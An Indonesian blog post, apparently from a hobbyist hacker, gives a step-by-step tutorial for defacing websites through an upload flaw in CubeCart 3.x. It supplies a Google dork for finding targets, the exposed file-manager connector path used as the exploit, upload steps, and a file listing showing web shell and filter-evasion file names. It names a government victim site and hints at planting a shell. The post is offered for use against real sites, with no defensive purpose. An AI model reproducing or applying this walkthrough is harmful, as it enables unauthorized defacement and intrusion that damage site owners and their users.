Apa itu deface?
defece : melakukan perubahan pada halaman web pada situs-situs tertentu, yang dilakukan oleh para hacker atau team tertentu dengan gerakan undergroundnya sebagai sebuah cyber gang fight untuk mengganggu informasi yang dimunculkan pada halaman situs yang dimaksud.
Ada banyak cara untuk nge deface web
but karna saya masih newbie.. saya masih dekit tau nya
maaf sebelumnya kalo ini ga berguna.. :)
hanya memberikan apa yang saya tau kepada teman² semua
OK kali ini saya akan memberikan tutor deface singkat
ada dua.. 1 upload *.html dan 1 lgi upload *.txt
jamin 1 jam dapet min 10 site :D
untuk Deface upload *.txt ke sini aj http://kidznapperz.blogspot.com/2011/03/cara-deface-with-txt.html
OK langsung aja.. :)
Autor : ho1onk a.k.a hogyz
email : ho1onk@mail.com
site : http://kidznapperz.blogspot.com/ & www.kartikapadang.blogspot.com
forum : http://hacker-newbie.org, Nyit-nyit.net & Snutz.us
title : CubeCart v 3.x Upload file Vulnerability
dork : powered by Kidznapperz
[+] exploit : http://localhost/[pacth]/admin/includes/rte/editor/filemanager/browser/default/connectors/test.html
Ok langsung aja yah..
sesuai judul CubeCart Upload file
buka google
masukkan dork.. terserah mau gimana caranya
salah satu nya adalah
intext:'powered by Kidznapperz
cari satu per satu,,
nah, kalo udah dapet target kito coba masukin exploit
ne hasil nya
Kita coba upload file *.html
1. pada connector pilih PHP
2. lalu pilih file html yang udah kita siapin.. trz klik Upload
Nah tandanya berhasil ato tidah uploadtan kita gini
Lihat SS berikut
“file uploaded with no errorsâ€
OK, udah berhasil di upload.. tapi file kita dimana ya?
Langsung klik Get folder and files
Kurang lebih seperti ini
<Connector command="GetFoldersAndFiles" resourceType="File">
<CurrentFolder path="/" url="/[pacth]/file/"/>
−
<Folders>
<Folder name="test"/>
</Folders>
−
<Files>
<File name="a_asp;_jpg(1).gif" size="53"/>
<File name="a_asp;_jpg.gif" size="53"/>
<File name="fe.php6" size="188"/>
<File name="robtz.html" size="18"/>
<File name="fe.php?" size="188"/>
<File name="fe_php." size="188"/>
<File name="hn(1).txt" size="1"/>
<File name="hn.txt" size="1"/>
<File name="r57.php~" size="108"/>
</Files>
</Connector>Dari data di atas kita bisa lihat file kita ada di “url/[pacth]/file/robtz.htmlâ€Contoh : http://site.gov.my/fileupload/file/robtz.html (udah kgk bisa di akses mohon berusaha y)
bakal keliatan seperti SS berikut..
Nah sekarang coba buka di halamna baru url tadi..
Itu lah halaman file yang kita upload tadi
kita berhasil masukin file deface an..
untuk shell sepertinya bisa dengan menyisipkan script ke dalam file tertentu seperti sudah pernah di jelaskan kk Alecs..
gimana? gampang bukan?
heheheh
=====================================
Oke sekian dolo semuanya
hihihiihihih
Selamat Defacer
2 komentar:
wakakak
udah pinter deface y wakakaak
we...
kgk juga kk... saya masih newbi kk bagian ini..
saya kan juga belajar dari kk :)
makasih atas petunjuknya yang dolo kk.. walaupun saya kgk ngerti yang kk share dolo
tapi saya tetap berterima kasih... hiihihi :)
Posting Komentar